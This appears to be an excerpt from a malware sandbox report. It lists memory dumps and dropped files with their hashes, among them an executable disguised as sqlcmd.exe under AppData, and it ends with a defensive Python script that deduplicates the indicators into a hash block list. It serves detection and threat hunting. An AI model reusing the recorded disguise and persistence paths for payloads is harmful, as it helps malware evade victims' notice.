memory/3468-441-0x00000277372C0000-0x00000277372C2000-memory.dmp

memory/3468-443-0x00000277372C3000-0x00000277372C5000-memory.dmp

memory/4168-446-0x000002EC1B740000-0x000002EC1B742000-memory.dmp

memory/4508-449-0x0000020491B60000-0x0000020491B62000-memory.dmp

memory/4508-452-0x0000020491B63000-0x0000020491B65000-memory.dmp

memory/4168-456-0x000002EC1B743000-0x000002EC1B745000-memory.dmp

memory/4280-458-0x000001F61DA80000-0x000001F61DA82000-memory.dmp

memory/4636-461-0x0000017097100000-0x0000017097102000-memory.dmp

memory/4636-462-0x0000017097103000-0x0000017097105000-memory.dmp

memory/4280-464-0x000001F61DA83000-0x000001F61DA85000-memory.dmp

memory/4708-490-0x0000000000000000-mapping.dmp

memory/4876-496-0x0000000000000000-mapping.dmp

memory/4928-518-0x0000000000000000-mapping.dmp

memory/4708-522-0x000002B811ED0000-0x000002B811ED2000-memory.dmp

memory/4708-524-0x000002B811ED3000-0x000002B811ED5000-memory.dmp

memory/3948-527-0x0000025273F16000-0x0000025273F18000-memory.dmp

memory/4508-529-0x0000020491B66000-0x0000020491B68000-memory.dmp

memory/4876-532-0x0000020744360000-0x0000020744362000-memory.dmp

memory/4876-537-0x0000020744363000-0x0000020744365000-memory.dmp

memory/4928-581-0x00000222EF610000-0x00000222EF612000-memory.dmp

memory/4928-586-0x00000222EF613000-0x00000222EF615000-memory.dmp

memory/3252-590-0x000001C771C86000-0x000001C771C88000-memory.dmp

memory/804-594-0x0000027B04D66000-0x0000027B04D68000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/3468-631-0x00000277372C6000-0x00000277372C8000-memory.dmp

memory/4168-637-0x000002EC1B746000-0x000002EC1B748000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a17ad8ee753e2f1f63e79d43ad16d608
SHA1 ebf0c8ee528e6a4e25a9a0d6df97c35e94a4cd53
SHA256 4179200e37a810eeba4c042984282f217193338abae23ec672e67facb2edf72b
SHA512 9e4dc85a34b064ea45cdcb9207591da006e1d005ed5672ae90a395ee46900205ac43703df1498e6327757c9e07a0d99360c78957d6ea51baa847bb4768d08c7a

memory/4280-682-0x000001F61DA86000-0x000001F61DA88000-memory.dmp

memory/4376-686-0x0000022A56AF6000-0x0000022A56AF8000-memory.dmp

memory/4636-731-0x0000017097106000-0x0000017097108000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/4708-778-0x000002B811ED6000-0x000002B811ED8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa25b2200314dffc21e8c1335a0fffb2
SHA1 21520e029fe2d3aea7b865641a4d4f8706cb3560
SHA256 614c6ba5368578c445bb951040f384cccb51b6e30c57153144954539857c3cb9
SHA512 7c1b4a339ec2df55eda17b0ccf9842747d684b2a5a334bd7fa80a5533dcc76a1a972f2a73190c3541c8bfeefd75a8fa7f43a8d5e119ca839d9010b47f894c2ab

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 034215a0325ba9038112a23bc0999f6f
SHA1 3fbf21f096321105816603df2f3e6b05e6b15dc7
SHA256 df68e6b07637bcd01df0df023f2e14632baa7a7bb3519fc24ee6a45915aff5ad
SHA512 5a5964ce4ced0e038ba66b74d72114a4edd1ee01407decf16dd4253bef658170b906db42d554ec81b66627519b25ba17aeb23f081722a9658e07e1bb16cbf85b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rqJB2Bm7T4.exe.log

MD5 0c2899d7c6746f42d5bbe088c777f94c
SHA1 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA256 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512 ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 14f4f893d2e7cc3ef6af7c7d8df2e5e8
SHA1 800e6addf73822ff83eb53aca3f8965e0ec272c4
SHA256 5b62b6c22f0cae44495303dfc35e3106d9a3c1b9e1fa75c0bd1e10b159ce2de4
SHA512 42b83a75535cc85ff5a8cc262f26cdc42ccbff0ff479aef8c7bf6a3f688fab3c525fcedd536f322b86aef9069cc90efbcfcd2670549dc0e425164df4fa43cb7f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40f583f516e0510c21745bea18ed7fc7
SHA1 1c8eed618dde7e2776d2e935123f027f947c9cec
SHA256 5711b707eb6ea0bfe0b128febe7e7e7d5861d6ca5cf6e9b945dd25f5b8ee834f
SHA512 afde45aca3c11cb977b5b926afad2baf295112b5f0799c0ac305284ef204424e46b77b88e00235ff719a3cd62f68a266a283bf6b45b56940acae8fdfa30f6b04

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 40f583f516e0510c21745bea18ed7fc7
SHA1 1c8eed618dde7e2776d2e935123f027f947c9cec
SHA256 5711b707eb6ea0bfe0b128febe7e7e7d5861d6ca5cf6e9b945dd25f5b8ee834f
SHA512 afde45aca3c11cb977b5b926afad2baf295112b5f0799c0ac305284ef204424e46b77b88e00235ff719a3cd62f68a266a283bf6b45b56940acae8fdfa30f6b04

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 49817e3096f023e743edb9f4bc004b20
SHA1 5f767dc6d8cd204a99e430396f58d8037ddee897
SHA256 ef277accd9d65bb592ba4f7078b8237fe70d9b23cd533befc88f177b94b822ba
SHA512 f392bfefea00a1f69fd78b5fdc300b6661514dc6d35bd270217f5a0fe64f1066dd6456db7f78b5dce1842314f73dcefd3da6dc001138ff2d3f298a9576f4c026

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 49817e3096f023e743edb9f4bc004b20
SHA1 5f767dc6d8cd204a99e430396f58d8037ddee897
SHA256 ef277accd9d65bb592ba4f7078b8237fe70d9b23cd533befc88f177b94b822ba
SHA512 f392bfefea00a1f69fd78b5fdc300b6661514dc6d35bd270217f5a0fe64f1066dd6456db7f78b5dce1842314f73dcefd3da6dc001138ff2d3f298a9576f4c026

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7256c512087fca627e4d8ad77d3ef2b
SHA1 92a6884cda0a3cb90af5d681715ac59b81a4bafb
SHA256 875fb04a4f6a42e25ff8fd162b240151beed2f8c5b202a03bef55dffe4c4e782
SHA512 9a718bbef16385d53fb58e8511c9c8c82881902c5128bbf0e80dcfc54232e86b44b963198ed77ab898df84f7b42185c6b6028f2d578f218334e6ab42ffd418e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f7256c512087fca627e4d8ad77d3ef2b
SHA1 92a6884cda0a3cb90af5d681715ac59b81a4bafb
SHA256 875fb04a4f6a42e25ff8fd162b240151beed2f8c5b202a03bef55dffe4c4e782
SHA512 9a718bbef16385d53fb58e8511c9c8c82881902c5128bbf0e80dcfc54232e86b44b963198ed77ab898df84f7b42185c6b6028f2d578f218334e6ab42ffd418e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 088d433eaeb40c732b52eb50654bfd25
SHA1 021eecfc8a9caf84c8b7cd5dfcd838ebe74d0270
SHA256 d1cbd00d73a42ca0faaed2208d89c3b4cd3efd5c6766f9d898dfbc12bc305be7
SHA512 6cdd45c478ad54f95b11dce53d50973c2e29d3729fba6d78a0b6c1e70d9a6daebbb9f0eac8691dd70d3442e85840418687d7e764a30bb193b3f0258abd9b3717

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 636821a18cc2b4208f45f7d405d400d6
SHA1 24adaf7d19a3b76f22edb3258c3edab247835cf7
SHA256 5202f94ae49c63822dcfc7ee6d96c259136800f699e036e46450ba84a19df3e3
SHA512 80f8d42fc70d0d14a0d4d6f026615c77e0005ac251470126542fe28dafb3945d53bd8f736c1050cfe9611320b96ba335a26fd797ab4506d6928f8f8c20947d4e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4cff3a07654618a2e9ea34bcf344ef37
SHA1 ee8344ee81d3b8a80c28ce974331cd28d927a3f0
SHA256 77d448bb0baaaa9ed1c3577b58f68e76ba86589a9b28125312688177e2118bbd
SHA512 1e9f785ee831343d13bb36695938d534cf181d39fbfe451e0338db9759203ea9476fe560432e3e75eb40c81e086bba7714f33ebeb6f8f1cd288acc4c829839c1

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\5TQ9Z63L\Bdojytwvbcgagbvmwkdspythmuhhgvq[1]

MD5 0381b7281382fd974fa960f89f893d92
SHA1 e49a5832692ef9bda4bf8a7e55765b154e37bc12
SHA256 0dc7f9eef6ad651077ea0f77b2963d5fecb0f1cdc8f229a207e3b94c42b33d37
SHA512 41a35220bd15777177fde4031021341fa140cd6f92fb0a549eabcd7286d7d507d4121d6fdebe5db57faa0eef475d56a998e1c529cc0cc0a6f3c59d2a328039c6

memory/5232-1018-0x00000000004019E4-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/5304-1021-0x0000000000000000-mapping.dmp
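The listing above is flat text: a path line, then its MD5/SHA1/SHA256/SHA512 lines, with memory/ dump entries interleaved, and a file appears once per write event, so the same payload shows up several times. The following is an added example, not part of the sandbox report, that parses that layout, folds repeated entries into one indicator per SHA256, and reports digests written under more than one path. On this page that surfaces the detail most worth acting on: the Temp drop I4CUk3nd1r.exe and the copy under AppData\Roaming\Microsoft\Network\sqlcmd.exe carry identical hashes, so the hunt should key on the digest, not the file name. The SAMPLE string is a short excerpt of the entries above; the regular expression for the memory/ dump file names is an assumption inferred from the entries shown rather than a documented schema, and hash lines that arrive before any path (as at the top of this page, where an entry was cut off) are kept as an entry with no path instead of being dropped.

```python
import re

# Constructed sample input: a short excerpt in the same layout as the Files
# listing above (path line, then MD5/SHA1/SHA256/SHA512 lines, interleaved
# with memory/ dump entries). Paths and hashes are copied from the report.
SAMPLE = r"""
memory/788-171-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\I4CUk3nd1r.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d

memory/736-175-0x0000000004BA0000-0x0000000004C00000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 3694ac62d90c1e9f89145f324dc0e204
SHA1 f2953a9ba829d6fd1e0955dbc95e55abd08234e1
SHA256 ce294b3c9e58d2d6394e2aa447ad3b586e0e23cdd22bd050a362bdd57a3e3fe9
SHA512 65a3c2503d26f440522b34307d7e64d2af1409391230daa99c21efb1718337acd6db6808efd26f4b0c3fc04e8566250d4662780a7510edefdbb65f53ae4ee21d
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
# Assumed layout of dump names as seen in the listing:
#   memory/<pid>-<seq>-<addr>[-<addr>]-(mapping|memory).dmp
DUMP_RE = re.compile(
    r"^memory/(\d+)-(\d+)-(0x[0-9A-Fa-f]+)(?:-(0x[0-9A-Fa-f]+))?-(mapping|memory)\.dmp$"
)


def parse_files_section(text):
    """Parse the Files listing into (files, dumps).

    files: list of {"path": str or None, "MD5": ..., "SHA1": ..., ...}.
           path is None for hash lines seen before any path line, i.e. an
           entry whose path was cut off at a page boundary.
    dumps: list of {"pid", "seq", "start", "end", "kind"} from memory/ lines;
           mapping.dmp names carry one address (end is None), memory.dmp
           names carry a start and an end address.
    """
    files, dumps = [], []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_RE.match(line)
        if m:
            pid, seq, start, end, kind = m.groups()
            dumps.append({"pid": int(pid), "seq": int(seq), "start": int(start, 16),
                          "end": int(end, 16) if end else None, "kind": kind})
            current = None  # a dump line closes the preceding file entry
            continue
        m = HASH_RE.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest has the wrong length: {line}")
            if current is None:
                current = {"path": None}  # orphaned hashes: path line missing
                files.append(current)
            current[algo] = digest
            continue
        current = {"path": line}  # any other non-empty line opens a new entry
        files.append(current)
    return files, dumps


def iocs_by_sha256(files):
    """Collapse repeated write events into one indicator per SHA256,
    keeping every distinct path the digest was written to, in listing order."""
    out = {}
    for f in files:
        if not f.get("path") or "SHA256" not in f:
            continue
        entry = out.setdefault(
            f["SHA256"], {"md5": f.get("MD5"), "sha1": f.get("SHA1"), "paths": []})
        if f["path"] not in entry["paths"]:
            entry["paths"].append(f["path"])
    return out


def find_copies(files):
    """Digests written under more than one distinct path: the same bytes staged
    under a second name, which a per-path hash list would not make visible."""
    return {h: sorted(e["paths"]) for h, e in iocs_by_sha256(files).items()
            if len(e["paths"]) > 1}


if __name__ == "__main__":
    parsed_files, parsed_dumps = parse_files_section(SAMPLE)
    print(f"{len(parsed_files)} file entries, {len(parsed_dumps)} dump entries")
    for sha256, paths in find_copies(parsed_files).items():
        print(sha256, "written to:", *paths, sep="\n  ")
```

Run it against the whole Files section of a report and the copies dictionary becomes the block list: every SHA256 in it is a payload the sample deliberately staged twice, and its second path is the persistence location to sweep on other hosts.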